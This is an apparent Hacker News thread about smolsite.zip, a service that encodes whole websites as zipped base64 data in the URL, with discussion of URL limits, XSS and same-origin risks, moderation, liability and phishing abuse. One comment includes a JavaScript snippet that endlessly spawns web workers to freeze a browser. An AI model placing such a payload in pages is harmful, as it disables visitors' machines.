(Un)fortunately web browsers [1] and URL shorteners block opening and redirecting to data URLs so they are useful mostly as bookmarks in the web browser.
That will send the content to the server for unpacking. A slightly more convoluted option might be to put the zip in the anchor part instead and have the response serve code to unpack it from there client side. Though now the server can't scan for damaging content being sent via it, even if it wanted to, as the anchor part does not get sent to the server.
I thought the same thing (though you could do it without anchors as long as the static content server used a glob for routing all traffic to the same web page). It would really simplify hosting.
I love this type of stuff too, but be aware ycombinator is a start up incubator - people showing off there wares is presumably encouraged, up to a point.
I don't think it qualifies as advertising. People come to Hacker News to see what hackers are working on. It's certainly a major reason why I come here.
Every Show HN post I've seen was interesting. Motivated me to start my own projects and polish them so I can show them here. It's a really good feeling when someone else submits your work and you get to talk about it.
I had an idea once to implement Borges's Library of Babel just like this: all the text is in the URL. With more sophisticated encoding, you can optimize English words. Then hook it up to a "search system" so you can search for your own name, clips of text, etc.
Eventually you'd hit the URL size limit, of course, but maybe we add a layer on top for curators to bundle sets of URLs together to produce larger texts. Maybe add some LLM magic to generate the bundles.
You'd end up with a library that has, not just every book ever written, but every book that could ever be written.
[Just kidding, of course: I know this is like saying that Notepad already has every book in existence--you just have to type them in.]
The comment in the first link about Yahoo embedding a giant b64-encoded JSON object in the URL reminds me of something horrible I did in a previous job.
To get around paying our website vendor (think locked-down hosted CMS) for an overpriced event calendar module, I coded a public page that would build a calendar using a base64-encoded basic JSON "events" schema embedded in a "data-events" attribute. Staff would use a non-public page that would pull the existing events data from the public page to prepopulate the calendar builder, which they could then use to edit the calendar and spit out a new code snippet to put on the public page. And so on.
It basically worked! But I think they eventually did just fork over the money for the calendar add-on.
Mostly just the DIV with a giant string of base64-encoded JSON in a data attribute that looked pretty ugly. Website visitors were of course basically none the wiser if it all worked.
I immediately thought this is a great way to ship malicious payloads to an unexpected party. A good WAF would block it as sus, but a few tricks could probably get around that as well
In this exact context it's likely not a problem, but essentially this is a ready to go XSS attack. As far as I can tell there is no CORS or domain level protections, so an "attacker" here could easily do anything else with any client-side data being used by any other "site" on the domain.
Let's say I make a little chat app that stores some history or some other data in local browser storage or cookies. Any other site can just as easily access all of that information. An "attacker" could link you to a modified version of the chat site that relays all of your messages to their server while still making it otherwise look like it's just the normal chat. It would also retain any client side information you had previously entered like your nick name or chat history, since it's stored in local storage.
Most of the time sanitizing input, like ensuring users don't have HTML in their names or comments, combined with domain-level separation and CORS policies ensures that one site can't do things that "leak" into another. It's the reason most of the time no matter how bad people mess things up Facebook getting hacked in your browser doesn't compromise your Google account.
Intrepid web developers reading this comment, please note that CORS is not, in fact, a protection mechanism. It's a way to relax the Same Origin Policy which is actually the protection relevant here. You don't need a CORS policy to protect a site from cross-site attacks, you need no CORS policy. Go ahead and make your little chat app, you're not at risk of having your messages stolen because of a lack of CORS headers.
I did say it wrong, but my point was that the site doesn't segment off each "site" into a different subdomain or any other ruleset that would allow the same origin policy to restrict access.
As it is with this site, the messages can get "stolen" by any other site on the same domain, which can be anything since anyone can upload one and direct a victim to them.
The difference is that if GitHub is found distributing malware on GitHub pages, you can notify them, they verify it, take it down, and open a process to eventually ban the offender.
They expend enough effort in this as to ensure the vast majority of content on GitHub pages is not malware, and avoid getting blankedly flagged as such.
It's not clear if smolsite.zip can successfully set up a similar process, given that they'll serve just any zip that's in the URL, and they won't have the manpower to verify takedown requests.
Cool little project! I did a similar thing recently, I wrote a pastebin that puts the file contents in the URL with brotli. [0]
It works quite well, but I'll need to update the syntax highlighting soon as at least Gleam is out of date (boy that language moves fast), and sometimes brotli-wasm throws a memory allocation error for some reason. I guess that's one cool thing that WASM brought to the table, memory handling issues.
you could save yourself from serving all the websites (and server costs) with just one character!
pass the base64 in the hash field by simply prepending # to it. also it seems the URL length limits do not include the hash, so maybe notsosmolsite.zip? ;)
https://news.ycombinator.com/item?id=37410630 is fun but it's too much of a follow-up* to the current thread. If you get in touch with us at hn@ycombinator.com after some time (say a month or two, to flush the hivemind caches), we'll send you a repost invite.
Ok, cool. I'm not sure I understand the issue though, this thread reminded me of that page, so I thought other people might be interested in it too, and there wasn't much conversation here and felt like this was somewhat offtopic on this page anyway.
You didn't do anything wrong! It's just that if you consider two principles: (1) frontpage space is by far the scarcest resource HN has; and (2) repetition isn't good for curiosity, it follows that we need to try to keep a fair amount of time and space between similar-ish topics.
It's also in the interest of the follow-up post because then community interest in that-type-of-thing can focus on it specifically instead of getting split between semantically-overlapping threads.
It doesn't seem like the client actually verifies that the content it got back matches the SHA256 it requested, so in theory if you really wanted to meet them you could start sending an update website with details to get in contact with you. Though, that'd ruin the magic of it I'd bet :)
I did something like this last year (maybe two years ago by now? time flies), but with LZString instead of gzip[0]. The original idea was actually someone else's on Mastodon (who knows, maybe it was OP? I think it was Ramsey Nassr though), but it was just B64 at first - I added the compression.
Then someone tried fitting King Lear in there (which worked).
Then it turned out that until that day but not for very long after that URLs were not counted for character limits in mastodon toots.
That froze quite a few Mastodon clients who were unlucky enough to open that toot for a day or two until that got fixed. Not sure why, I'm guessing (accidentally) quadratic algorithms that weren't counting on urls that were multiple kilobytes in length.
I like embedding external resources such as bitmap images in SVG in CSS in HTML so that a document is truly portable and can be sent by email or messenger services. So I don't need a URL. The whole document has to be shared, not just a link to it.
I also found the favicon can be encoded in this way.
I don't do scripts, but a lot of fun can be had with HTML when you start doing unusual things with it. For CSS I also use my own units, just for fun. So no pixels, ems or points, but something else... CSS variables make this possible. I like to use full semantic elements and have minimal classes, styling the elements. This should confuse the front end developer more used to the 'painting by numbers' approach of typical website frontend work.
I just work from the HTML specs and go my own way. There is something I am working on that 'needs' this stuff. I see HTML as a creative medium and I wanted to solve problems such as internal document navigation - rather than hundreds of web pages, compile the lot into one.
The PWA takes an entirely different approach to what I am trying to do. I like the PWA approach but I want one file that can be moved or emailed, to be available offline.
I found that making all the images inline worked for me. I got best results with webp rather than avif but don't care about losing the size benefits with base64 encoding - once zipped those compress nicely.
I like how it requires sending all the data up to the server, where I guess it gets discarded, returns a static HTML page that converts that same data on the client into a web page.
Has the advantages of being centralized (site can be shut down, nuking all URLS) and decentralized (requires tech skills to set up, site cannot be updated without changing URL, etc.). Adding tinyurl to this as suggested in another comment takes it to the next level!
I wonder what happens about the liability for content on these URL-websites. Is the liability now on the one who shares the URL, or on those who serves it?
Also having fun on this subject https://goog.space/, trying to add webRTC and yjs, also archive.is for storing a link (and minification). Fun to see so many people are trying things out with URLs, client side web apps, encoding/decoding data
Some images are base64 in URLs in Google image search results for their thumbnails. Does anyone have any idea why?
Search "Pepsi can" and some when you right click > copy image address will result in "data:image/jpeg;base64,/.../" instead of the website's image. Presumably to limit server cost / make the browser render? It's not for all sites, so perhaps more common sites (Walmart for example) it gives the correct image URL.
Specifically for a gallery page of search results, I'd guess that it's to provide a more-consistent experience.
When you load that results page, you'd be reaching out to ~100+ different domains that will respond and render the images at different rates (and some will fail to load at all). Base64-encoding lets you shove binary content into caches like Redis, retrieval and embedding of which would be preferable to hotlinking to a slow site. Then most of the page gets rendered at the same time client-side.
I still have control over the domain I bought a few years ago to implement something similar.
What ultimately stopped me is that on a site of this type you can't really include links to other sites made the same way, because your URL length is going to balloon.
Coolest application of those data URL ever. It's amazing how simple this idea is yet I have NEVER considered trying it out. I am not surprised this idea has already been done before, but it's still somehow never crossed my imagination.
I can't do it right now, but think of this: we can then create a site that, upon some input, creates a zip file and links to itself, in a possible infinite loop of self generating web sites!
The bad news is it required firefox nightly and honestly I'd be surprised if it even still works because Mozilla laid off the people who were working on libdweb.
"Compression bombs that use the zip format must cope with the fact that DEFLATE, the compression algorithm most commonly supported by zip parsers, cannot achieve a compression ratio greater than 1032. For this reason, zip bombs typically rely on recursive decompression, nesting zip files within zip files to get an extra factor of 1032 with each layer. But the trick only works on implementations that unzip recursively, and most do not."
Wouldn't infinitely spawning web workers do the same thing as a zip bomb?
```
<script>
const workerBlob = new Blob(['
while (true) { console.log("this is a worker that will never stop") }
'], { type: 'application/javascript' })
const workerBlobURL = URL.createObjectURL(workerBlob)
while (true) { new Worker(workerBlobURL) }
cool. alas, i've got all .zip domains blocked because the vast majority of them are used by malware people trying to trick someone into "downloading a zip file"
Thinking of reasons to not do this though, it's effectively impossible to content moderate, at least not without building a database of all the content you don't want to host.
That's even worse. The issue is not that you have the bytes, it's that users see the content on your site. The less control you have the more difficult it would be to meet legal obligations surrounding user generated content.
The deal made years ago in law in the US (and followed around the world) is that websites are not liable for the user generated content that they make available, as long as they remove it if requested for legitimate reasons. These two components go hand in hand. If a website is unable to remove content, it's effectively liable for that content. This basically breaks the web as we know it today.
Base122 or whatever the other option is (and I'm sure there are others), which tries to take advantage of the whole UTF-8 space, and probably wouldn't even work on URLs, is only something like 15% denser. Obviously, you're limited to printable characters, here.
Your citation says Chrome supports 32779 and Safari >64k. I think it’s fair to say that, as a user (disregarding potential search engine aspects), 8000-character URLs are 100% fine these days.
Yeah, I had exactly that, but in my opinion better, with fullscreen mode on https://flems.io. Right up until hackers found it was a great place to host their phishing sites...
I created a website years ago that let anyone come and just "post" something online anonymously, quick notes or whatever, but have since had to add a registration process and record ip addresses, as the website was overrun by what looked like russian hackers and the dark web in general looking for a place for uh... post links to child... well anyways, took me almost a month to track down all my own website links, as everything was encrypted and growing faster than i could delete it. def sucks to know that even though i took down the means for a place for them to 'conduct business', they will continue to find other websites.
Auth is handled in the playground.
We offer "Sign in with GitHub, Google, Microsoft, Facebook, and Apple". Anyone can see the code with /? but only the owner(s) can (re-)deploy it.
---
There is also service worker support which deploys as a Cloudflare Worker!
Yeah, server-side is much easier to code. But it should be doable with JS
I've already built a website that read zip files client-side with JS here: https://madacol.github.io/ozempic-dicom-viewer/ . It will read the zip file and search for MRI/CT scan images to display
Where I have doubts is how to reference external files from the main `index.html` file. I know you can load files as blobs and get a URL (I did that in my website above), but I am not sure if that will work as references in the <head>
Data is already stored in the ZIP file deflated, so I can just send whatever is inside the ZIP file back to the client if they accept that encoding (which is pretty much always the case, given how ubiquitous deflate is).
The server parses the ZIP file and stores that information in a hash table for quicker lookup but it's otherwise not decompressing anything. This hash table is kept for a few minutes to avoid having to decode the base64-encoded data and parse the ZIP file for every request.
So decompression is happening on the client, but not at the JS level, instead you are taking advantage of browser's ability to accept zip-encoded content from the server, hence decompression is done the by browser's own behavior when it receives a "content-encoding: gzip" stream or something like that.
The iframe's sandbox attribute is doing a lot of work. I tried to change the parent window location to remove the footer, but the sandbox thwarted me since it didn't include "allow-same-origin".
It's collected after 15min, give or take. The hash isn't random, it's the SHA-1 hash of the base64-encoded data, so it's predictable -- if something keeps accessing the base-64 encoded URL, the /s/... URL won't vanish.
I tried making it more strict (by checking the Sec-Fetch-Site and Sec-Fetch-Dest headers), but not all browsers send that.
https://smolsite.zip/UEsDBBQAAgAIAFtLJ1daaE7RlwIAAN4EAAAKAAA...